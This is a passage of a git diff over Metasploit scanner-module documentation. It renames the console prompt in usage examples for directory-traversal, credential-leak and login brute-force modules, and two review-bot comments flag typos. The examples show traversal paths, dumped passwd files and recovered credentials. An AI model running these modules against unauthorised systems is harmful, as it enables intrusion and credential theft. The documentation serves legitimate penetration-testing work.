b/documentation/modules/auxiliary/scanner/http/citrix_dir_traversal.md 
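Review bot: the cisco_device_manager.md hunk carries the misspelled option through the rename: the new line still reads `set vebose true` with `vebose => true` as the echo. As written the example sets an unrelated datastore key instead of `verbose`, so readers copying it will not get the verbose output the scenario implies. Correct the spelling in both the command and its echo while this line is being changed.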
@@ -27,7 +27,7 @@ This module checks if a target server is vulnerable by issuing an HTTP GET reque ## Scenarios ``` -msf5 auxiliary(scanner/http/citrix_dir_traversal) > options +msf auxiliary(scanner/http/citrix_dir_traversal) > options Module options (auxiliary/scanner/http/citrix_dir_traversal): @@ -42,13 +42,13 @@ Module options (auxiliary/scanner/http/citrix_dir_traversal): THREADS 1 yes The number of concurrent threads (max one per host) VHOST no HTTP server virtual host -msf5 auxiliary(scanner/http/citrix_dir_traversal) > run +msf auxiliary(scanner/http/citrix_dir_traversal) > run [+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781. [+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/citrix_dir_traversal) > +msf auxiliary(scanner/http/citrix_dir_traversal) > ``` ## References diff --git a/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md b/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md index 95cea4a0fe..00a1030834 100644 --- a/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/dicoogle_traversal.md 
@@ -19,12 +19,12 @@ successfully tested against Windows targets. ### Tested on Windows 2012 with Dicoogle 2.5.0 on Java 8 update 151 ``` - msf5 > use auxiliary/scanner/http/dicoogle_traversal - msf5 auxiliary(scanner/http/dicoogle_traversal) > set rhosts 1.1.1.1 + msf > use auxiliary/scanner/http/dicoogle_traversal + msf auxiliary(scanner/http/dicoogle_traversal) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 - msf5 auxiliary(scanner/http/dicoogle_traversal) > set verbose true + msf auxiliary(scanner/http/dicoogle_traversal) > set verbose true verbose => true - msf5 auxiliary(scanner/http/dicoogle_traversal) > run + msf auxiliary(scanner/http/dicoogle_traversal) > run [+] 192.168.2.164:8080 - ; for 16-bit app support [fonts] diff --git a/documentation/modules/auxiliary/scanner/http/docker_version.md b/documentation/modules/auxiliary/scanner/http/docker_version.md index b1316c2ec0..a58ea3b6d8 100644 --- a/documentation/modules/auxiliary/scanner/http/docker_version.md +++ b/documentation/modules/auxiliary/scanner/http/docker_version.md @@ -11,12 +11,12 @@ Enable this to dump all info to the screen. ## Usage ``` -msf5 > use auxiliary/scanner/http/docker_version -msf5 auxiliary(scanner/http/docker_version) > set rhosts 127.0.0.1 +msf > use auxiliary/scanner/http/docker_version +msf auxiliary(scanner/http/docker_version) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(scanner/http/docker_version) > set verbose true +msf auxiliary(scanner/http/docker_version) > set verbose true verbose => true -msf5 auxiliary(scanner/http/docker_version) > run +msf auxiliary(scanner/http/docker_version) > run [*] Identifying Docker Server Version on 127.0.0.1:2375 [+] [Docker Server] Version: 18.03.1-ce @@ -24,5 +24,5 @@ msf5 auxiliary(scanner/http/docker_version) > run [*] Saving host information. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/docker_version) > +msf auxiliary(scanner/http/docker_version) > ``` 
diff --git a/documentation/modules/auxiliary/scanner/http/enum_wayback.md b/documentation/modules/auxiliary/scanner/http/enum_wayback.md index a9ad76966a..96fba2aa3d 100644 --- a/documentation/modules/auxiliary/scanner/http/enum_wayback.md +++ b/documentation/modules/auxiliary/scanner/http/enum_wayback.md @@ -7,10 +7,10 @@ during a web assessment. Finding unlinked and old pages. This module utilizes ## Usage ``` -msf5 > use auxiliary/scanner/http/enum_wayback -msf5 auxiliary(scanner/http/enum_wayback) > set domain rapid7.com +msf > use auxiliary/scanner/http/enum_wayback +msf auxiliary(scanner/http/enum_wayback) > set domain rapid7.com domain => rapid7.com -msf5 auxiliary(scanner/http/enum_wayback) > run +msf auxiliary(scanner/http/enum_wayback) > run [*] Pulling urls from Archive.org [*] Located 43656 addresses for rapid7.com diff --git a/documentation/modules/auxiliary/scanner/http/f5_mgmt_scanner.md b/documentation/modules/auxiliary/scanner/http/f5_mgmt_scanner.md index 76ee63ffb6..6f4b4d44f5 100644 --- a/documentation/modules/auxiliary/scanner/http/f5_mgmt_scanner.md +++ b/documentation/modules/auxiliary/scanner/http/f5_mgmt_scanner.md @@ -24,7 +24,7 @@ This module attempts to identify the web management interfaces of the following ### BigIP 15.1.0.2 Virtual-Edition ``` - msf5 auxiliary(scanner/http/f5_mgmt_scanner) > run + msf auxiliary(scanner/http/f5_mgmt_scanner) > run [+] F5 BigIP web management interface found [*] Scanned 1 of 1 hosts (100% complete) diff --git a/documentation/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.md b/documentation/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.md index d87b13bae5..03c3e1319e 100644 --- a/documentation/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.md +++ b/documentation/modules/auxiliary/scanner/http/fortimail_login_bypass_detection.md 
@@ -20,7 +20,7 @@ Tested against the following versions of FortiMail: ## Scenarios ``` -msf5 auxiliary(scanner/http/fortimail_login_bypass_detection) > run +msf auxiliary(scanner/http/fortimail_login_bypass_detection) > run [*] Checking vulnerability at 172.16.144.198 [+] 172.16.144.198 - Vulnerable version of FortiMail detected diff --git a/documentation/modules/auxiliary/scanner/http/fortinet_ssl_vpn.md b/documentation/modules/auxiliary/scanner/http/fortinet_ssl_vpn.md index 07414d6452..a3ea0e7ae1 100644 --- a/documentation/modules/auxiliary/scanner/http/fortinet_ssl_vpn.md +++ b/documentation/modules/auxiliary/scanner/http/fortinet_ssl_vpn.md @@ -19,7 +19,7 @@ The module supports several hosts at the same time. IP-Addresses have been masked with x ``` -msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run +msf auxiliary(scanner/http/fortinet_ssl_vpn) > run [+] xxxx:xxxx:xxxx:xxxx::4:443 - Server is responsive... [+] xxxx:xxxx:xxxx:xxxx::4:443 - Application appears to be Fortinet SSL VPN. Module will continue. @@ -37,4 +37,4 @@ msf5 auxiliary(scanner/http/fortinet_ssl_vpn) > run [*] Scanned 2 of 2 hosts (100% complete) [*] Auxiliary module execution completed -``` \ No newline at end of file +``` diff --git a/documentation/modules/auxiliary/scanner/http/git_scanner.md b/documentation/modules/auxiliary/scanner/http/git_scanner.md index b1b24b706d..aab9c684db 100644 --- a/documentation/modules/auxiliary/scanner/http/git_scanner.md +++ b/documentation/modules/auxiliary/scanner/http/git_scanner.md 
@@ -52,12 +52,12 @@ root@kali:/var/www/html# service apache2 start ### Metasploit git on Kali ``` -msf5 > use auxiliary/scanner/http/git_scanner -msf5 auxiliary(scanner/http/git_scanner) > set rhosts 127.0.0.1 +msf > use auxiliary/scanner/http/git_scanner +msf auxiliary(scanner/http/git_scanner) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(scanner/http/git_scanner) > set TARGETURI /metasploit-framework/.git/ +msf auxiliary(scanner/http/git_scanner) > set TARGETURI /metasploit-framework/.git/ TARGETURI => /metasploit-framework/.git/ -msf5 auxiliary(scanner/http/git_scanner) > run +msf auxiliary(scanner/http/git_scanner) > run [+] http://127.0.0.1/metasploit-framework/.git/ - git repo (version 2) found with 10064 files [+] http://127.0.0.1/metasploit-framework/.git/config - git config file found diff --git a/documentation/modules/auxiliary/scanner/http/goahead_traversal.md b/documentation/modules/auxiliary/scanner/http/goahead_traversal.md index bb4d269645..8e095efb0a 100644 --- a/documentation/modules/auxiliary/scanner/http/goahead_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/goahead_traversal.md @@ -103,12 +103,12 @@ root@kali:/tmp/goahead-3.4.1# build/linux-x64-default/bin/goahead --verbose --ho Install from the instructions at the top of this document. ``` -msf5 > use auxiliary/scanner/http/goahead_traversal -msf5 auxiliary(scanner/http/goahead_traversal) > set rhosts 127.0.0.1 +msf > use auxiliary/scanner/http/goahead_traversal +msf auxiliary(scanner/http/goahead_traversal) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(scanner/http/goahead_traversal) > set depth 5 +msf auxiliary(scanner/http/goahead_traversal) > set depth 5 depth => 5 -msf5 auxiliary(scanner/http/goahead_traversal) > run +msf auxiliary(scanner/http/goahead_traversal) > run root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
diff --git a/documentation/modules/auxiliary/scanner/http/http_hsts.md b/documentation/modules/auxiliary/scanner/http/http_hsts.md index 0bd0883df1..0de70150a4 100644 --- a/documentation/modules/auxiliary/scanner/http/http_hsts.md +++ b/documentation/modules/auxiliary/scanner/http/http_hsts.md @@ -104,15 +104,15 @@ Finally, execute the following commands: Install using following instructions for Ubuntu listed above. ``` -msf5 > use auxiliary/scanner/http/http_hsts -msf5 auxiliary(scanner/http/http_hsts) > set RHOSTS 192.168.90.91 +msf > use auxiliary/scanner/http/http_hsts +msf auxiliary(scanner/http/http_hsts) > set RHOSTS 192.168.90.91 RHOSTS => 192.168.90.91 -msf5 auxiliary(scanner/http/http_hsts) > run +msf auxiliary(scanner/http/http_hsts) > run [+] 192.168.90.91:443 - Strict-Transport-Security:max-age=63072000; includeSubdomains [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/http_hsts) > +msf auxiliary(scanner/http/http_hsts) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/http_sickrage_password_leak.md b/documentation/modules/auxiliary/scanner/http/http_sickrage_password_leak.md index d67d1bae80..c9cce8e220 100644 --- a/documentation/modules/auxiliary/scanner/http/http_sickrage_password_leak.md +++ b/documentation/modules/auxiliary/scanner/http/http_sickrage_password_leak.md @@ -45,10 +45,10 @@ ### Tested on Windows 7 x86 ``` - msf5 > use auxiliary/scanner/http/http_sickrage_password_leak - msf5 auxiliary(scanner/http/http_sickrage_password_leak) > set RHOSTS 192.168.37.130 + msf > use auxiliary/scanner/http/http_sickrage_password_leak + msf auxiliary(scanner/http/http_sickrage_password_leak) > set RHOSTS 192.168.37.130 RHOSTS => 192.168.37.130 - msf5 auxiliary(scanner/http/http_sickrage_password_leak) > run + msf auxiliary(scanner/http/http_sickrage_password_leak) > run [+] git username: myUsername [+] git password: myPassword 
@@ -61,5 +61,5 @@ [+] Email username: sickrage@sickrage.com [+] Email password: sickragepass [*] Auxiliary module execution completed - msf5 auxiliary(scanner/http/http_sickrage_password_leak) > + msf auxiliary(scanner/http/http_sickrage_password_leak) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md b/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md index 43d8295bd7..a358dadcf0 100644 --- a/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/httpdasm_directory_traversal.md @@ -44,10 +44,10 @@ ### Tested on Windows XP x86 ``` - msf5 > use auxiliary/scanner/http/httpdasm_directory_traversal - msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > set rhosts 192.168.37.128 + msf > use auxiliary/scanner/http/httpdasm_directory_traversal + msf auxiliary(scanner/http/httpdasm_directory_traversal) > set rhosts 192.168.37.128 rhosts => 192.168.37.128 - msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > run + msf auxiliary(scanner/http/httpdasm_directory_traversal) > run [boot loader] timeout=30 @@ -56,5 +56,5 @@ multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [*] Auxiliary module execution completed - msf5 auxiliary(scanner/http/httpdasm_directory_traversal) > + msf auxiliary(scanner/http/httpdasm_directory_traversal) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/iis_internal_ip.md b/documentation/modules/auxiliary/scanner/http/iis_internal_ip.md index 26d44d382f..f3d91f83bb 100644 --- a/documentation/modules/auxiliary/scanner/http/iis_internal_ip.md +++ b/documentation/modules/auxiliary/scanner/http/iis_internal_ip.md 
@@ -21,17 +21,17 @@ IP address in then body ### IIS with SSL ``` -msf5 > use auxiliary/scanner/http/iis_internal_ip -msf5 auxiliary(scanner/http/iis_internal_ip) > set ssl true +msf > use auxiliary/scanner/http/iis_internal_ip +msf auxiliary(scanner/http/iis_internal_ip) > set ssl true [!] Changing the SSL option's value may require changing RPORT! ssl => true -msf5 auxiliary(scanner/http/iis_internal_ip) > set rport 443 +msf auxiliary(scanner/http/iis_internal_ip) > set rport 443 rport => 443 -msf5 auxiliary(scanner/http/iis_internal_ip) > set rhosts 2.2.2.2 +msf auxiliary(scanner/http/iis_internal_ip) > set rhosts 2.2.2.2 rhosts => 2.2.2.2 -msf5 auxiliary(scanner/http/iis_internal_ip) > set verbose true +msf auxiliary(scanner/http/iis_internal_ip) > set verbose true verbose => true -rmsf5 auxiliary(scanner/http/iis_internal_ip) > run +rmsf auxiliary(scanner/http/iis_internal_ip) > run [*] 2.2.2.2:443 - Requesting GET / HTTP/1.0 [+] Location Header: https://10.1.1.20/home @@ -48,4 +48,4 @@ rmsf5 auxiliary(scanner/http/iis_internal_ip) > run - https://www.exploit-db.com/exploits/20096 - https://support.microsoft.com/en-us/help/218180/internet-information-server-returns-ip-address-in-http-header-content - https://support.microsoft.com/en-us/help/967342/fix-the-internal-ip-address-of-an-iis-7-0-server-is-revealed-if-an-htt -- https://techcommunity.microsoft.com/t5/iis-support-blog/iis-web-servers-running-in-windows-azure-may-reveal-their/ba-p/826500 \ No newline at end of file +- https://techcommunity.microsoft.com/t5/iis-support-blog/iis-web-servers-running-in-windows-azure-may-reveal-their/ba-p/826500 diff --git a/documentation/modules/auxiliary/scanner/http/influxdb_enum.md b/documentation/modules/auxiliary/scanner/http/influxdb_enum.md index b1b128defb..072069d325 100644 --- a/documentation/modules/auxiliary/scanner/http/influxdb_enum.md +++ b/documentation/modules/auxiliary/scanner/http/influxdb_enum.md 
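Review bot: in the first iis_internal_ip.md hunk (-21,17) the last prompt line keeps a stray leading character: `-rmsf5 auxiliary(scanner/http/iis_internal_ip) > run` becomes `+rmsf auxiliary(scanner/http/iis_internal_ip) > run`, and the second hunk header shows the same `rmsf5` context. The replace was applied mechanically here; drop the leading `r` so the prompt matches the other lines in the block. The "IP address in then body" wording visible in the hunk header context is also worth fixing in a follow-up.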
@@ -10,12 +10,12 @@ This module enumerates databases on InfluxDB using the REST API using the defaul ## Scenarios ``` -msf5 > use auxiliary/scanner/http/influxdb_enum -msf5 auxiliary(scanner/http/influxdb_enum) > set RHOST 172.25.65.20 +msf > use auxiliary/scanner/http/influxdb_enum +msf auxiliary(scanner/http/influxdb_enum) > set RHOST 172.25.65.20 RHOST => 172.25.65.20 -msf5 auxiliary(scanner/http/influxdb_enum) > set VERBOSE true +msf auxiliary(scanner/http/influxdb_enum) > set VERBOSE true VERBOSE => true -msf5 auxiliary(scanner/http/influxdb_enum) > run +msf auxiliary(scanner/http/influxdb_enum) > run [+] 172.25.65.20:8086 - Influx Version: 1.5.1 [+] 172.25.65.20:8086 - Influx DB Found: @@ -43,4 +43,4 @@ msf5 auxiliary(scanner/http/influxdb_enum) > run [+] File saved in: /Users/unix/.msf4/loot/20180423050119_default_172.25.65.20_influxdb.enum_623871.txt [*] Auxiliary module execution completed -``` \ No newline at end of file +``` diff --git a/documentation/modules/auxiliary/scanner/http/joomla_pages.md b/documentation/modules/auxiliary/scanner/http/joomla_pages.md index 87ef7f10bd..21104c511a 100644 --- a/documentation/modules/auxiliary/scanner/http/joomla_pages.md +++ b/documentation/modules/auxiliary/scanner/http/joomla_pages.md @@ -13,10 +13,10 @@ This module scans for Joomla Content Management System running on a web server f ## Usage ``` -msf5 > use auxiliary/scanner/http/joomla_pages -msf5 auxiliary(scanner/http/joomla_pages) > set rhosts 192.168.2.39 +msf > use auxiliary/scanner/http/joomla_pages +msf auxiliary(scanner/http/joomla_pages) > set rhosts 192.168.2.39 rhosts => 192.168.2.39 -msf5 auxiliary(scanner/http/joomla_pages) > run +msf auxiliary(scanner/http/joomla_pages) > run [+] Page Found: /robots.txt [+] Page Found: /administrator/index.php diff --git a/documentation/modules/auxiliary/scanner/http/joomla_plugins.md b/documentation/modules/auxiliary/scanner/http/joomla_plugins.md index 2811f08bc9..3d0abe70e4 100644 
--- a/documentation/modules/auxiliary/scanner/http/joomla_plugins.md +++ b/documentation/modules/auxiliary/scanner/http/joomla_plugins.md @@ -6,10 +6,10 @@ The list can be found in [data/wordlists/joomla.txt](https://github.com/rapid7/m ## Usage ``` -msf5 > use auxiliary/scanner/http/joomla_plugins -msf5 auxiliary(scanner/http/joomla_plugins) > set rhosts 192.168.2.39 +msf > use auxiliary/scanner/http/joomla_plugins +msf auxiliary(scanner/http/joomla_plugins) > set rhosts 192.168.2.39 rhosts => 192.168.2.39 -msf5 auxiliary(scanner/http/joomla_plugins) > run +msf auxiliary(scanner/http/joomla_plugins) > run [+] Plugin: /?1.5.10-x [+] Plugin: /?1.5.11-x-http_ref diff --git a/documentation/modules/auxiliary/scanner/http/joomla_version.md b/documentation/modules/auxiliary/scanner/http/joomla_version.md index b4b1239036..e1d49d404e 100644 --- a/documentation/modules/auxiliary/scanner/http/joomla_version.md +++ b/documentation/modules/auxiliary/scanner/http/joomla_version.md @@ -5,10 +5,10 @@ This module scans for Joomla Content Management System running on a web server. ## Usage ``` -msf5 > use auxiliary/scanner/http/joomla_version -msf5 auxiliary(scanner/http/joomla_version) > set rhosts 192.168.2.39 +msf > use auxiliary/scanner/http/joomla_version +msf auxiliary(scanner/http/joomla_version) > set rhosts 192.168.2.39 rhosts => 192.168.2.39 -msf5 auxiliary(scanner/http/joomla_version) > run +msf auxiliary(scanner/http/joomla_version) > run [*] Server: Apache/2.4.29 (Ubuntu) [+] Joomla version: 3.8.2 diff --git a/documentation/modules/auxiliary/scanner/http/jupyter_login.md b/documentation/modules/auxiliary/scanner/http/jupyter_login.md index 864e674346..a05f62a95b 100644 --- a/documentation/modules/auxiliary/scanner/http/jupyter_login.md +++ b/documentation/modules/auxiliary/scanner/http/jupyter_login.md 
@@ -39,36 +39,36 @@ original IPython Notebook system. This module is compatible with both standard J ### Jupyter Notebook 4.3.0 With No Authentication Requirement ``` -msf5 > use auxiliary/scanner/http/jupyter_login -msf5 auxiliary(scanner/http/jupyter_login) > set RHOSTS 192.168.159.128 +msf > use auxiliary/scanner/http/jupyter_login +msf auxiliary(scanner/http/jupyter_login) > set RHOSTS 192.168.159.128 RHOSTS => 192.168.159.128 -msf5 auxiliary(scanner/http/jupyter_login) > set PASS_FILE /tmp/passwords.txt +msf auxiliary(scanner/http/jupyter_login) > set PASS_FILE /tmp/passwords.txt PASS_FILE => /tmp/passwords.txt -msf5 auxiliary(scanner/http/jupyter_login) > run +msf auxiliary(scanner/http/jupyter_login) > run [*] 192.168.159.128:8888 - The server responded that it is running Jupyter version: 4.3.0 [+] 192.168.159.128:8888 - No password is required. [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/jupyter_login) > +msf auxiliary(scanner/http/jupyter_login) > ``` ### Jupyter Notebook 6.0.2 With A Password Set ``` -msf5 > use auxiliary/scanner/http/jupyter_login -msf5 auxiliary(scanner/http/jupyter_login) > set RHOSTS 192.168.159.128 +msf > use auxiliary/scanner/http/jupyter_login +msf auxiliary(scanner/http/jupyter_login) > set RHOSTS 192.168.159.128 RHOSTS => 192.168.159.128 -msf5 auxiliary(scanner/http/jupyter_login) > set PASS_FILE /tmp/passwords.txt +msf auxiliary(scanner/http/jupyter_login) > set PASS_FILE /tmp/passwords.txt PASS_FILE => /tmp/passwords.txt -msf5 auxiliary(scanner/http/jupyter_login) > run +msf auxiliary(scanner/http/jupyter_login) > run [*] 192.168.159.128:8888 - The server responded that it is running Jupyter version: 6.0.2 [-] 192.168.159.128:8888 - LOGIN FAILED: :Password (Incorrect) [+] 192.168.159.128:8888 - Login Successful: :Password1 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/jupyter_login) > +msf 
auxiliary(scanner/http/jupyter_login) > ``` [1]: https://jupyter-notebook.readthedocs.io/en/stable/changelog.html#release-4-3 diff --git a/documentation/modules/auxiliary/scanner/http/limesurvey_zip_traversals.md b/documentation/modules/auxiliary/scanner/http/limesurvey_zip_traversals.md index 2667d12689..abdb3fed90 100644 --- a/documentation/modules/auxiliary/scanner/http/limesurvey_zip_traversals.md +++ b/documentation/modules/auxiliary/scanner/http/limesurvey_zip_traversals.md @@ -120,7 +120,7 @@ resource (lime41.rb)> md5sum ~/.msf4/loot/* 3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__407491.txt 3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__149900.txt 3cf5f3492b7c77a77f74124bb4ccb528 /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__611969.txt -msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt +msf auxiliary(scanner/http/limesurvey_zip_traversals) > cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt [*] exec: cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt root:x:0:0:root:/root:/bin/bash diff --git a/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md b/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md index 03cca6bd63..94a1d7603c 100644 --- a/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md +++ b/documentation/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.md 
@@ -31,13 +31,13 @@ ## Scenarios ``` - msf5 > use auxiliary/scanner/http/manageengine_deviceexpert_user_creds - msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > set rhosts 172.16.158.131 + msf > use auxiliary/scanner/http/manageengine_deviceexpert_user_creds + msf auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > set rhosts 172.16.158.131 rhosts => 172.16.158.131 - msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > check + msf auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > check [+] 172.16.158.131:6060 - The target is vulnerable. [*] Checked 1 of 1 hosts (100% complete) - msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > run + msf auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > run [*] 172.16.158.131:6060 - Found weak credentials (admin:admin) @@ -51,7 +51,7 @@ [*] Credentials saved in: /Users/jvazquez/.msf4/loot/20140926165907_default_172.16.158.131_manageengine.dev_118155.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed - msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > creds 172.16.158.131 + msf auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > creds 172.16.158.131 Credentials =========== diff --git a/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md b/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md index 6fbd0c3aa4..d94380da0f 100644 --- a/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md +++ b/documentation/modules/auxiliary/scanner/http/onion_omega2_login.md 
@@ -41,12 +41,12 @@ root master ## Scenario ``` -msf5 > use auxiliary/scanner/http/onion_omega2_login -msf5 auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1 +msf > use auxiliary/scanner/http/onion_omega2_login +msf auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1 RHOSTS => 192.168.3.1 -msf5 auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt +msf auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt USERPASS_FILE => something.txt -msf5 auxiliary(scanner/http/onion_omega2_login) > run +msf auxiliary(scanner/http/onion_omega2_login) > run [*] Running for 192.168.3.1... [*] 192.168.3.1:80 - [ 1/16] - root:123456 - Failure diff --git a/documentation/modules/auxiliary/scanner/http/owa_login.md b/documentation/modules/auxiliary/scanner/http/owa_login.md index 8258e916b8..7c4ded54a0 100644 --- a/documentation/modules/auxiliary/scanner/http/owa_login.md +++ b/documentation/modules/auxiliary/scanner/http/owa_login.md @@ -15,7 +15,7 @@ be saved as potentially valid usernames unless we get a successful login. ## Scenarios ``` -msf5 auxiliary(scanner/http/owa_login) > run +msf auxiliary(scanner/http/owa_login) > run [*] webmail.hostingcloudapp.com:443 OWA - Testing version OWA_2013 [+] Found target domain: HOSTINGCLOUDAPP @@ -57,4 +57,4 @@ msf5 auxiliary(scanner/http/owa_login) > run [*] webmail.hostingcloudapp.com:443 OWA - FAILED LOGIN, BUT USERNAME IS VALID. 0.275251 'HOSTINGCLOUDAPP\bob' : 'fido': SAVING TO CREDS [*] Auxiliary module execution completed -``` \ No newline at end of file +``` diff --git a/documentation/modules/auxiliary/scanner/http/phpmyadmin_login.md b/documentation/modules/auxiliary/scanner/http/phpmyadmin_login.md index 0e3e6ef646..4fdd6d9321 100644 --- a/documentation/modules/auxiliary/scanner/http/phpmyadmin_login.md +++ b/documentation/modules/auxiliary/scanner/http/phpmyadmin_login.md 
@@ -18,19 +18,19 @@ ### Tested on PhpMyAdmin Versions 4.0.10.20, 4.5.0, 4.8.1, 4.8.2, 5.0 ``` - msf5 > use auxiliary/scanner/http/phpmyadmin_login - msf5 auxiliary(scanner/http/phpmyadmin_login) > set rhosts 192.168.37.151 + msf > use auxiliary/scanner/http/phpmyadmin_login + msf auxiliary(scanner/http/phpmyadmin_login) > set rhosts 192.168.37.151 rhosts => 192.168.37.151 - msf5 auxiliary(scanner/http/phpmyadmin_login) > set targeturi phpmyadmin-4.8.2/index.php + msf auxiliary(scanner/http/phpmyadmin_login) > set targeturi phpmyadmin-4.8.2/index.php targeturi => phpmyadmin-4.8.2/index.php - msf5 auxiliary(scanner/http/phpmyadmin_login) > set password password + msf auxiliary(scanner/http/phpmyadmin_login) > set password password password => password - msf5 auxiliary(scanner/http/phpmyadmin_login) > run + msf auxiliary(scanner/http/phpmyadmin_login) > run [*] PhpMyAdmin Version: 4.8.2 [+] 192.168.37.151:80 - Success: 'root:password' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed - msf5 auxiliary(scanner/http/phpmyadmin_login) > + msf auxiliary(scanner/http/phpmyadmin_login) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/rips_traversal.md b/documentation/modules/auxiliary/scanner/http/rips_traversal.md index 7770cdfdc5..c29c949139 100644 --- a/documentation/modules/auxiliary/scanner/http/rips_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/rips_traversal.md 
@@ -24,12 +24,12 @@ ## Scenarios ``` - msf5 > use auxiliary/scanner/http/rips_traversal - msf5 auxiliary(scanner/http/rips_traversal) > set rhosts 172.16.191.188 + msf > use auxiliary/scanner/http/rips_traversal + msf auxiliary(scanner/http/rips_traversal) > set rhosts 172.16.191.188 rhosts => 172.16.191.188 - msf5 auxiliary(scanner/http/rips_traversal) > set filepath /etc/hosts + msf auxiliary(scanner/http/rips_traversal) > set filepath /etc/hosts filepath => /etc/hosts - msf5 auxiliary(scanner/http/rips_traversal) > run + msf auxiliary(scanner/http/rips_traversal) > run  127.0.0.1        localhost    diff --git a/documentation/modules/auxiliary/scanner/http/springcloud_directory_traversal.md b/documentation/modules/auxiliary/scanner/http/springcloud_directory_traversal.md index 00eae85635..bfd3252a6c 100644 --- a/documentation/modules/auxiliary/scanner/http/springcloud_directory_traversal.md +++ b/documentation/modules/auxiliary/scanner/http/springcloud_directory_traversal.md @@ -24,10 +24,10 @@ hyness/spring-cloud-config-server:2.1.6.RELEASE \ ### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux ``` -msf5 auxiliary(scanner/http/springcloud_directory_traversal) > run +msf auxiliary(scanner/http/springcloud_directory_traversal) > run [+] File saved in: /Users/Dhiraj/.msf4/loot/20200619234552_default_[REDACTED]_springcloud.trav_785232.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/http/springcloud_directory_traversal) > +msf auxiliary(scanner/http/springcloud_directory_traversal) > ``` diff --git a/documentation/modules/auxiliary/scanner/http/thinvnc_travesal.md b/documentation/modules/auxiliary/scanner/http/thinvnc_travesal.md index 939ffe65e8..5dcc4a4122 100644 --- a/documentation/modules/auxiliary/scanner/http/thinvnc_travesal.md +++ b/documentation/modules/auxiliary/scanner/http/thinvnc_travesal.md 
